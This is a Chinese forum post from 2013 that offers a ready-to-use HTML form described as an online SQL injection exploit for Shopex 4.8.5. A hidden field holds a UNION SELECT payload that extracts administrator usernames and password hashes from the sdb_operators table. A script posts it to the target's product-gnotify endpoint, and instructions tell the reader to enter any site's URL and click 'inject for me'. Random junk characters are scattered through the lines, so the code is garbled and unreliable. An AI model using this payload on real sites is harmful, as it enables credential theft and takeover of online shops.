<center>) `! S1 ]$ N4 B2 {
<title>中国网络渗透测评联盟-中测联盟|-Shopex 4.8.5 SQL Injection Exp 在线版</title>1 b9 i2 ?1 n ]* K: X/ ^, w! h6 G! V4 l
<form action="" method="post" name="submit_url">3 J1 [) ^+ V& R' } t- ~3 z
网址:<input type=text name=url value="http://www.political-security.com/" size=62><br><br>% ^# ^$ l8 a9 h; h, g
<input type="hidden" name="goods[goods_id]" value="3">
% T1 z% W2 H5 c7 {; G; f! z<input type="hidden" name="goods[product_id]" value="1 and 1=2 union select 1,2,3,4,5,6,7,8,concat(0x245E,username,0x2D3E,userpass,0x5E24),10,11,12,13,14,15,16,17,18,19,20,21,22 from sdb_operators">$ X6 D) F+ A) [: Q% ?7 h
<input type="submit" value="给我注入" onclick=fsubmit()>
2 h. G+ ~6 Q+ L: j1 e% J; y9 E% B</form> <br /><br />填上你要注入的网址(注意要打上http:// 要不跳转不了) 点“给我注入”就要以了。//www.political-security.com, k) o, s9 i$ V7 [
. g0 @4 Y' j- w3 l1 S6 m& y5 X9 O
<script>
5 l0 J \" J/ y2 C$ B% Zfunction fsubmit(){
m1 a1 \! a1 oform = document.forms[0];
, c9 U! P* H7 [form.action = form.url.value+'/?product-gnotify';
- _8 I1 N: A8 z0 n7 U& o6 `( J Oform.submit();
' z4 P3 B/ k9 _& F5 i}
$ K7 z j B: Z( Y# z9 [7 l</script>. E& Z9 |1 E; Q4 B1 E
|
发表于 2013-1-23 09:20:52
收藏
支持
反对